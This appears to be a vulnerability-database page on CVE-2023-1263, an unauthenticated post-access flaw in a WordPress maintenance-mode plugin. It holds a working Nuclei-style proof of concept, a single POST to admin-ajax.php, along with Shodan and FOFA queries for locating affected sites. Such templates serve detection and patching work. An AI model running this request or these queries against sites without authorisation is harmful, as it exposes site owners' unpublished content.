CVE-2023-1263: Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access

日期: 2025-08-01 | 影响软件: Coming Soon & Maintenance 4.1.7 | POC: 已公开

漏洞描述

The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.

PoC代码[已公开]

id: CVE-2023-1263

info:
  name: Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access
  author: r3Y3r53
  severity: medium
  description: |
    The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.
  remediation: Fixed in version 4.1.7
  reference:
    - https://wpscan.com/vulnerability/2e07ffd9-8e82-4078-96aa-162ef78c417b
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1263
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cmp-coming-soon-maintenance/cmp-coming-soon-maintenance-plugin-by-niteothemes-416-information-exposure
    - https://wordpress.org/plugins/cmp-coming-soon-maintenance/
    - https://plugins.trac.wordpress.org/browser/cmp-coming-soon-maintenance/tags/4.1.6/niteo-cmp.php#L2759
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-1263
    cwe-id: CWE-200
    epss-score: 0.10375
    epss-percentile: 0.92888
    cpe: cpe:2.3:a:niteothemes:coming_soon_\&_maintenance:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: niteothemes
    product: coming_soon_\&_maintenance
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/cmp-coming-soon-maintenance/
    fofa-query: body=/wp-content/plugins/cmp-coming-soon-maintenance/
    publicwww-query: "/wp-content/plugins/cmp-coming-soon-maintenance/"
  tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth,niteothemes,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=cmp_get_post_detail&id=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"img":'
          - '"date":'
          - '"title":'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100854cf482d59f618b832f9a5d843936b7a96c7d9a04df0106d99fdf18c3a63f6e022100b11dae560b495b898d1f9eb1c0af90ad3eba1e3226d1958c7b2c3ba8c27bf7ca:922c64590222798bb761d5b6d8e72950

相关漏洞推荐